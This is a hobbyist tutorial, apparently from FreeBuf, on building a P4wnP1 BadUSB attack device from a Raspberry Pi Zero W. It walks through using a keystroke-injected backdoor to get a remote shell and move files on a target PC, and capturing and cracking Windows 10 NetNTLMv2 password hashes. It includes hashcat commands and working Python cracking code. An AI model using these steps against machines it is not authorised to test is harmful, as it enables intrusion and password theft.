Become a Physical Hacker: Implementing the P4wnP1 Project with Raspberry Pi for Penetration Testing

Some readers will see the title and picture something rather more literal.

Of course, that is not what today is about~

When we were young we probably saw it in a movie: the master hacker pulls out a USB stick, taps at the keyboard for a few seconds, and suddenly some big boss's computer is unlocked. Did you wonder then whether one day you could do that too?

This kind of USB stick is called a BadUSB, and there are finished products from foreign teams (for example Hak5's Bash Bunny), but the price really hurts…

So the question becomes: as a hobbyist on a budget, naturally we want to build one at the lowest possible cost. That is how I found the open-source project P4wnP1.

P4wnP1 is a highly customizable USB attack platform, based on a low-cost Raspberry Pi Zero or Raspberry Pi Zero W (required for HID backdoor).

Without further ado, let’s get straight to the point!

What You Need

Raspberry Pi Zero W (Taobao sells the Zero, Zero W and Zero WH; we need the on-board Wi-Fi, which the plain Zero lacks, so choose the Zero W; the WH only adds pre-soldered GPIO headers)

A microSD (TF) card (8 GB is enough; larger is fine too)

USB dongle add-on board [optional] (it lets the Zero plug straight into a USB-A port like a thumb drive; if you would rather not buy one, a micro-USB data cable plugged into the Zero's port marked USB, not the one marked PWR, works too)

System image: there is a pitfall here. With the latest Raspbian image I ran into problems (Wi-Fi could not be configured and would not connect), so I chose the 2017 release of Raspbian Jessie. After downloading, unzip the archive to get the .img file.

Installation

Hardware Installation

Since soldering is a hassle, I simply bought the version with the USB add-on board already fitted. (The original post shows photos of the assembled board here.)

System Installation

Software: Win32DiskImager or Rufus (3.4 at the time of writing); either works.

Taking Rufus as the example: put the TF card in a card reader, open Rufus, choose the .img file we downloaded as the boot selection, check that the selected target device really is the card and not another disk, and click Start.

Writing the image takes about 5 minutes.

Wi-Fi Configuration

Note: the Pi Zero W only supports the 2.4 GHz band, so a 5 GHz-only network will never show up for it!

After writing the image, configure the Pi's network connection. Open the boot partition (the small FAT partition, the only one Windows shows) and create two files in it: wpa_supplicant.conf, and an empty file named ssh (no extension). On first boot Raspbian moves the former into /etc/wpa_supplicant/ and the latter enables the SSH server.

In wpa_supplicant.conf, write your network configuration (this puts the Pi on the same network as your computer so that you can reach it over SSH). The first three lines are the usual global header, the same one the stock Raspbian file carries; change CN to your own two-letter country code. The format is:

ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=netdev
update_config=1
country=CN

network={
    ssid="WiFi_name"
    psk="mypassword"
    key_mgmt=WPA-PSK
    priority=1
}

network={
    ssid="WiFi_name2"
    psk="password"
    key_mgmt=WPA-PSK
    priority=2
    scan_ssid=1
}

Meaning of the fields:

ssid - the Wi-Fi name
psk - the Wi-Fi password (stored here in plain text, so anyone who gets hold of the card can read it)
key_mgmt - WPA-PSK for WPA/WPA2-Personal networks; NONE for WEP or for an open network without a password
priority - which network to prefer when several are in range: the higher number wins, so WiFi_name2 above is tried first. Listing more than one network is cheap insurance against one of them failing to connect.
scan_ssid - set to 1 if the network hides its SSID

After configuring Wi-Fi, make sure the empty ssh file really sits in the root of that same boot partition, next to wpa_supplicant.conf and without an extension: with Windows' "hide extensions for known file types" enabled it is easy to end up with ssh.txt, which does nothing.

With both files in place, insert the TF card into the Raspberry Pi and connect it to the computer.

SSH Connection to Raspberry Pi

Once the Pi is plugged in (it is powered over the USB cable), wait one or two minutes, then look for a device named raspberrypi in the router's client list and note its IP address.

Next we connect over SSH with PuTTY (any other SSH client works just as well):

Enter the Pi's address and connect. The account is pi and the password is raspberry. Change that password now with passwd: later on the same account is reachable over the P4wnP1 access point, and the default is the first thing anyone will try against it.

Configuring and Installing P4wnP1

After connecting, it is recommended to switch to a domestic mirror first so that downloads are faster (for users in mainland China).

To change the source:
sudo nano /etc/apt/sources.list
Replace the existing deb line with the mirror line below. The release name must match the image you wrote (jessie for the 2017 Jessie image chosen above); pointing a Jessie system at stretch mixes packages from two releases and is a common cause of a broken install.
deb http://mirrors.aliyun.com/raspbian/raspbian/ jessie main contrib non-free rpi
Ctrl+O to save, Ctrl+X to exit

Configuring Environment

sudo apt-get update
sudo apt-get install git john
git clone --recursive https://github.com/mame82/P4wnP1

(john is John the Ripper, which the Windows 10 lock-picker payload uses later; --recursive also fetches the project's submodules.) After cloning, run:

cd P4wnP1/
./install.sh

This takes a long time. The installer asks a few questions along the way; accepting the defaults is fine.

When the installer's completion message appears, the installation succeeded!

Usage

After completing the above steps, plug the Raspberry Pi into the machine you are testing (here a Windows 10 desktop serves as the target).

The Pi brings up a Wi-Fi access point named P4wnP1; the initial password is MaMe82-P4wnP1. That password is public knowledge, so change it in setup.cfg (and in the payload file if the payload sets its own; see Problems Encountered) before you take the device anywhere.

After connecting to the access point, open PuTTY and connect to 172.24.0.1 on port 22; the login is still the Pi's account (pi, with whatever password you set).

Depending on the active payload, logging in may drop you straight into the P4wnP1 shell instead of a normal bash prompt.

To change payloads, edit setup.cfg in the P4wnP1 installation directory:

sudo nano /P4wnP1/setup.cfg

setup.cfg contains many settings that you can adjust to your needs. Some of them have pitfalls; see the Problems Encountered section at the end.

Changing Payloads

To change payloads you need the directory the project was installed to, and that is not always where you expect it. On one of my installs the installation directory ended up somewhere else, while on later installs it stayed in the directory I had cloned into. If you cannot find it, search for it:

sudo find / -type d -name P4wnP1 2>/dev/null

In the installation directory, edit setup.cfg:

sudo nano /P4wnP1/setup.cfg

Scroll to the bottom to the payload selection block. It is a list of PAYLOAD= lines, most of them starting with #, which means they are inactive. The project loads exactly one payload at a time, so as long as network_only is the active line no other payload runs. Here we use hid_backdoor_remote.txt as the example.

Put a # in front of the network_only line and remove the # in front of the hid_backdoor_remote line, so that exactly one PAYLOAD= line is left uncommented.

Save and exit, then reboot the Pi or simply unplug and reinsert the cable.

When you SSH in again and land in the P4wnP1 shell instead of bash, the change took effect and you can get to work~

Practical (Taking hid_backdoor_remote as an example)

In the P4wnP1 shell, the first command is FireStage1: it types the stage-1 loader into the target through the emulated keyboard, and once that code is running on the target it calls back to the Pi. When the words "client connect" appear, the connection is up.

P.S. Enter help to list the available commands.

Taking shell as the example, enter shell.

You now have a command prompt on the target, running as the user who is logged in there (the backdoor has exactly that user's privileges, no more).

To leave shell mode, press Ctrl+C.

Explanations of some of the commands:

SendDuckyScript - sends a keyboard (DuckyScript) script

SendMouseScript - sends a mouse script

download - downloads a file from the target to the Raspberry Pi

upload - uploads a file from the Raspberry Pi to the target

shell - opens a command prompt on the target

CreateProc - creates a process on the target (for example, CreateProc notepad opens Notepad)

sendkeys xxx - types the keystrokes 'xxx' on the target

The remaining commands are explained in the official manual.

Cracking Windows 10 Passwords

This is the most interesting feature of P4wnP1, though after my own testing it does have some limitations.

In short: the Pi is plugged into a locked Windows machine and presents itself as a USB network adapter. Windows tries to authenticate over that link, and the Pi captures the NetNTLMv2 challenge-response it sends (the format hashcat calls -m 5600, used below). That value is then brute-forced offline by hashing candidate passwords and comparing. Trivial passwords like abc or 123 fall quickly; a long mix of letters and digits can take a very long time.

If the password is weak

Set the lock-picker payload (win10_lockpicker.txt in the upstream payloads directory), plug the Pi into the locked machine and leave it there. The captured hash is handed to the built-in John the Ripper module. As the upstream documentation puts it:

You leave P4wnP1 plugged and the hashes are handed over to John the Ripper, which tries to bruteforce the captured hash.

If the password of the user who locked the box is weakly chosen, chances are high that John the Ripper is able to crack it, which leads to…

For example, the password on my target machine was abc. With the Pi plugged in, wait a while, then enter the password to get into Windows. Now connect another machine to the Pi's hotspot and run:

cd /P4wnP1/collected
ls

The collected folder holds the captured hashes. If the password is weak, a file ending in .hashes.cracked appears after a while; open it to read the password in plain text.

If the password is strong but you know its structure

Here I recommend hashcat. It runs on the CPU as well, but it is built for GPU computation, and that is where the speed comes from.

Copy the captured hash into hash.txt and run:

hashcat64.exe -m 5600 hash.txt -a 3 ?d?d?d?d?d?l?l

(Newer hashcat releases name the binary hashcat.exe.) In this command, -m 5600 selects the NetNTLMv2 format, which is what the lock-picker captures; hash.txt is a copy of the .hashes file from the collected folder; -a 3 selects a mask attack, and each ? token fixes the character class at one position: ?d is a digit and ?l a lowercase letter, so the mask above tries every password of five digits followed by two lowercase letters (10^5 × 26^2, about 68 million candidates).

For the full mask syntax, see the hashcat documentation.
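The following is an added example (editor's code, not P4wnP1's, John the Ripper's or hashcat's) that shows what both cracking paths above actually compute. A line in the collected file has the form user::domain:server_challenge:NTProofStr:blob, the format hashcat -m 5600 consumes, and a guess is correct when recomputing NTProofStr from it reproduces the captured value: NT hash = MD4 of the UTF-16LE password, v2 key = HMAC-MD5 of UPPER(user)+domain under the NT hash, NTProofStr = HMAC-MD5 of challenge+blob under the v2 key. The user name, host name, challenge and blob in the samples are made up, and the sample lines are built here from known passwords (abc, as in the text, and a two-character one for the mask run); the small mask expander plays the role of -a 3 for a mask small enough to run in pure Python.

```python
# Added example, not P4wnP1/John/hashcat code: what "cracking" the captured hash means.
# The lock-picker stores NetNTLMv2 lines of the form
#     user::domain:server_challenge:NTProofStr:blob        (hashcat -m 5600)
# and a candidate password is correct when recomputing NTProofStr from it matches.
# The sample lines below are constructed from known passwords; nothing here was captured.
import hashlib
import hmac
import itertools
import string
import struct

MASK32 = 0xFFFFFFFF

def _lrot(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK32

def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib's md4 is often disabled on OpenSSL 3 builds."""
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (  # (boolean function, additive constant, shift table, word order)
        (lambda x, y, z: (x & y) | (~x & z), 0, (3, 7, 11, 19), tuple(range(16))),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999, (3, 5, 9, 13),
         (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1, (3, 9, 11, 15),
         (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    for off in range(0, len(msg), 64):
        words = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for fn, k, shifts, order in rounds:
            for i, j in enumerate(order):
                a = _lrot((a + fn(b, c, d) + words[j] + k) & MASK32, shifts[i % 4])
                a, b, c, d = d, a, b, c
        state = [(s + v) & MASK32 for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)

def ntlm_hash(password: str) -> bytes:
    """NT hash: MD4 over the UTF-16LE password (the value Windows stores in the SAM)."""
    return md4(password.encode("utf-16-le"))

def nt_proof(password: str, user: str, domain: str, challenge: bytes, blob: bytes) -> bytes:
    """NTLMv2: v2 key = HMAC-MD5(NT hash, UPPER(user)+domain); NTProofStr = HMAC-MD5(v2 key, challenge+blob)."""
    v2_key = hmac.new(ntlm_hash(password), (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()
    return hmac.new(v2_key, challenge + blob, hashlib.md5).digest()

def parse_line(line: str):
    """Split user::domain:challenge:proof:blob into fields, decoding the hex ones."""
    user, _, domain, chal, proof, blob = line.strip().split(":")
    return user, domain, bytes.fromhex(chal), bytes.fromhex(proof), bytes.fromhex(blob)

def check_password(line: str, candidate: str) -> bool:
    user, domain, chal, proof, blob = parse_line(line)
    return hmac.compare_digest(nt_proof(candidate, user, domain, chal, blob), proof)

def crack(line: str, candidates):
    """First candidate that reproduces NTProofStr, or None (the same test John and hashcat run, only slower)."""
    for pw in candidates:
        if check_password(line, pw):
            return pw
    return None

MASK_SETS = {"d": string.digits, "l": string.ascii_lowercase, "u": string.ascii_uppercase}

def mask_candidates(mask: str):
    """Expand a hashcat-style mask such as ?d?d?l; characters outside ?x tokens are literal."""
    sets, i = [], 0
    while i < len(mask):
        if mask[i] == "?":
            sets.append(MASK_SETS[mask[i + 1]])
            i += 2
        else:
            sets.append(mask[i])
            i += 1
    for combo in itertools.product(*sets):
        yield "".join(combo)

def make_line(password: str, user: str, domain: str, challenge: bytes, blob: bytes) -> str:
    """Build a collected-file line from a known password (used only for the constructed samples)."""
    proof = nt_proof(password, user, domain, challenge, blob)
    return f"{user}::{domain}:{challenge.hex()}:{proof.hex()}:{blob.hex()}"

# Constructed samples: user, host, challenge and blob are made up; "abc" follows the text.
CHALLENGE = bytes.fromhex("1122334455667788")
BLOB = bytes.fromhex("0101000000000000" + "00" * 8 + "aabbccddeeff0011" + "00" * 8)
WEAK_LINE = make_line("abc", "victim", "DESKTOP-TEST", CHALLENGE, BLOB)
MASK_LINE = make_line("3z", "victim", "DESKTOP-TEST", CHALLENGE, BLOB)
WORDLIST = ["123456", "password", "abc", "letmein"]

if __name__ == "__main__":
    print("wordlist hit:", crack(WEAK_LINE, WORDLIST))
    print("mask ?d?l hit:", crack(MASK_LINE, mask_candidates("?d?l")))
```

crack() is deliberately the naive loop: John and hashcat perform the same comparison with far faster MD4 and HMAC-MD5 implementations, which is why the full ?d?d?d?d?d?l?l mask (about 68 million candidates) belongs on a GPU rather than in this script. Note also that nothing in the line is reversible; the password is only recovered if it is in the candidate set.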

Penetration Testing from a Phone

Two recommended SSH apps:

Android: JuiceSSH

iOS: Shelly

Problems Encountered

If You Really Find the Installation Process Troublesome

The upstream author also provides a prebuilt system image that can be written straight to the TF card (linked from the P4wnP1 project page listed under Reference Documents).

SSH Connection Issues

If SSH refuses the connection, first check that you created the ssh file after configuring Wi-Fi (and that it is really named ssh, not ssh.txt). If the file is there and it still will not connect, reboot the router in case its client table is stale (I have seen this when a Pi that previously had a system on it was reimaged and then could not be reached). If that does not help either, reinstall the system. A different symptom, PuTTY warning that the host key has changed, is expected after reimaging: the fresh install generated new SSH host keys. Accept the new key only if you have just reimaged the device yourself.

Wi-Fi Name Setting Issues

"I changed the Wi-Fi name in setup.cfg, but the access point that comes up is not the one I set. Why?"

Because of load order: P4wnP1 reads setup.cfg first and then the selected payload file, and a payload may carry its own copy of some settings (Wi-Fi name, password and so on), which then override what setup.cfg says. The fix is to comment out those options inside the payload file; for any option the payload does not set, the value from setup.cfg applies.
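As an added helper (editor's code, not part of P4wnP1) that performs the two edits described under Changing Payloads and in this section mechanically and checks them: select_payload() leaves exactly one PAYLOAD= line active and refuses a name that is not listed, and effective() merges setup.cfg and a payload in the assumed boot order (setup.cfg first, payload second) and reports which file each value came from, so the "why is my SSID ignored" question can be answered before rebooting. The file excerpts are constructed here; the key names follow the upstream setup.cfg, and the parser only understands plain KEY=value lines with optionally quoted literals, not shell expansions.

```python
# Added helper, not part of P4wnP1. Two edits from the text done mechanically:
#   1) activate exactly one PAYLOAD= line in setup.cfg (one payload at a time)
#   2) show which file a setting's effective value comes from, and comment out a
#      payload's override so the setup.cfg value applies.
# Assumptions: setup.cfg and payload files are shell-style KEY=value lines (quoted
# literals only, no shell expansion), and P4wnP1 sources setup.cfg first and then the
# selected payload, so a key set in both takes the payload's value.
import re

# group 1: leading '#' if the line is commented out; group 2: key; group 3: raw value
ASSIGN = re.compile(r"^\s*(#?)\s*([A-Za-z_][A-Za-z0-9_]*)=(.*?)\s*$")


def _unquote(raw: str) -> str:
    raw = raw.strip()
    return raw[1:-1] if len(raw) >= 2 and raw[0] == raw[-1] and raw[0] in "\"'" else raw


def select_payload(cfg_text: str, want: str) -> str:
    """Return cfg_text with `want` as the only uncommented PAYLOAD= line.
    Raises ValueError if `want` is not listed, so a typo cannot silently keep network_only."""
    out, found = [], False
    for line in cfg_text.splitlines():
        m = ASSIGN.match(line)
        if m and m.group(2) == "PAYLOAD":
            value = m.group(3).strip()
            if _unquote(value) == want:
                out.append(f"PAYLOAD={value}")
                found = True
            else:
                out.append(f"#PAYLOAD={value}")
        else:
            out.append(line)
    if not found:
        raise ValueError(f"payload {want!r} is not listed in setup.cfg")
    return "\n".join(out) + "\n"


def active_payloads(cfg_text: str) -> list:
    """Every uncommented PAYLOAD= value; a correct file yields exactly one."""
    return [_unquote(m.group(3)) for m in map(ASSIGN.match, cfg_text.splitlines())
            if m and m.group(1) == "" and m.group(2) == "PAYLOAD"]


def settings(text: str) -> dict:
    """Uncommented KEY=value assignments in file order; a later line wins, as in the shell."""
    result = {}
    for line in text.splitlines():
        m = ASSIGN.match(line)
        if m and m.group(1) == "":
            result[m.group(2)] = _unquote(m.group(3))
    return result


def effective(cfg_text: str, payload_text: str) -> dict:
    """Merge in boot order and record provenance: {key: (value, 'setup.cfg' or 'payload')}."""
    merged = {k: (v, "setup.cfg") for k, v in settings(cfg_text).items()}
    merged.update({k: (v, "payload") for k, v in settings(payload_text).items()})
    return merged


def disable_override(payload_text: str, key: str) -> str:
    """Comment out the payload's own assignment of `key` so the setup.cfg value applies."""
    out = []
    for line in payload_text.splitlines():
        m = ASSIGN.match(line)
        out.append(f"#{line}" if m and m.group(1) == "" and m.group(2) == key else line)
    return "\n".join(out) + "\n"


# Constructed excerpts (not the real files); key names follow the upstream setup.cfg.
SAMPLE_SETUP_CFG = """\
WIFI_ACCESSPOINT_NAME="MyOwnAP"
WIFI_ACCESSPOINT_PSK="MaMe82-P4wnP1"
# payload selection
PAYLOAD=network_only.txt
#PAYLOAD=hid_backdoor_remote.txt
#PAYLOAD=win10_lockpicker.txt
"""
SAMPLE_PAYLOAD = """\
# a payload that ships its own access point name, overriding setup.cfg
WIFI_ACCESSPOINT_NAME="P4wnP1"
"""

if __name__ == "__main__":
    print(select_payload(SAMPLE_SETUP_CFG, "hid_backdoor_remote.txt"))
    for key, (value, origin) in effective(SAMPLE_SETUP_CFG, SAMPLE_PAYLOAD).items():
        print(f"{key} = {value!r}  (from {origin})")
```

To use it on the device, read /P4wnP1/setup.cfg and the payload file into strings, pass them to these functions, and write select_payload()'s result back (with sudo, since the file is root-owned); effective() on the real files tells you, for each key, whether the payload is the one overriding your setup.cfg value.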

Raspberry Pi Not in Hotspot Mode, Still Connecting as a Wi-Fi Client

sudo -i
nano /etc/network/interfaces

Remove the wlan0 stanza that points at your home Wi-Fi (the block containing wpa-conf /etc/wpa_supplicant/wpa_supplicant.conf; this is the part that was framed in the original screenshot), so that the interface is free for P4wnP1 to run its access point on.

Connected Successfully, But Main Program Shell Interface Does Not Pop Up

On the target machine, try a USB 3.0 port; with some USB 2.0 ports I sometimes see this.

Windows 10 Password Cracking Mode Cannot Obtain Hash Value

I plugged the Pi in while the machine was at the lock screen and waited a while before unlocking. Sometimes there is a delay, and sometimes no hash is captured at all. In that case, clear the contents of the collected folder, lock the target machine again and retry.

Reference Documents

P4wnP1 (GitHub project page)

P4wnP1 official wiki

hashcat

How to Turn Your Raspberry Pi into a "Penetration Testing Tool"

Snag Windows Passwords With Pi Zero | P4wnP1

*Author of this article: Milu. This article belongs to the FreeBuf original reward plan; reproduction without permission is prohibited.
